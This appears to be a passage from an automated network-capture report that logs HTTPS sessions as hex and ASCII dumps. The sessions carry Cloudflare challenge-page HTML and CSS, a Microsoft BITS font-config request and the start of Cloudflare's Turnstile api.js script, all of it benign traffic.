                                                                            2024-10-28 08:36:16 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                            2024-10-28 08:36:16 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                                            Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
                                                                            2024-10-28 08:36:16 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                                            Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                                            2024-10-28 08:36:16 UTC1369INData Raw: 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f
                                                                            Data Ascii: nge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-o
                                                                            2024-10-28 08:36:16 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e
                                                                            Data Ascii: .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-lin
                                                                            2024-10-28 08:36:16 UTC1369INData Raw: 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23 66
                                                                            Data Ascii: fset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#f
                                                                            2024-10-28 08:36:16 UTC1369INData Raw: 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65 69
                                                                            Data Ascii: low:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{hei
                                                                            2024-10-28 08:36:16 UTC1369INData Raw: 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69 66
                                                                            Data Ascii: rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justif
                                                                            2024-10-28 08:36:16 UTC1369INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69
                                                                            Data Ascii: ext-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-li


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.449746184.28.90.27443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:16 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Encoding: identity
                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                            Range: bytes=0-2147483646
                                                                            User-Agent: Microsoft BITS/7.8
                                                                            Host: fs.microsoft.com
                                                                            2024-10-28 08:36:17 UTC515INHTTP/1.1 200 OK
                                                                            ApiVersion: Distribute 1.1
                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                            Content-Type: application/octet-stream
                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                            Server: ECAcc (lpl/EF06)
                                                                            X-CID: 11
                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                            X-Ms-Region: prod-weu-z1
                                                                            Cache-Control: public, max-age=188365
                                                                            Date: Mon, 28 Oct 2024 08:36:17 GMT
                                                                            Content-Length: 55
                                                                            Connection: close
                                                                            X-CID: 2
                                                                            2024-10-28 08:36:17 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.449747104.18.94.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:17 UTC383OUTGET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:17 UTC471INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:17 GMT
                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                            Content-Length: 47672
                                                                            Connection: close
                                                                            accept-ranges: bytes
                                                                            last-modified: Wed, 23 Oct 2024 21:21:17 GMT
                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                            access-control-allow-origin: *
                                                                            cross-origin-resource-policy: cross-origin
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998e7bc30486e-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:17 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                            Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                            Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                            Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                            Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                            Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
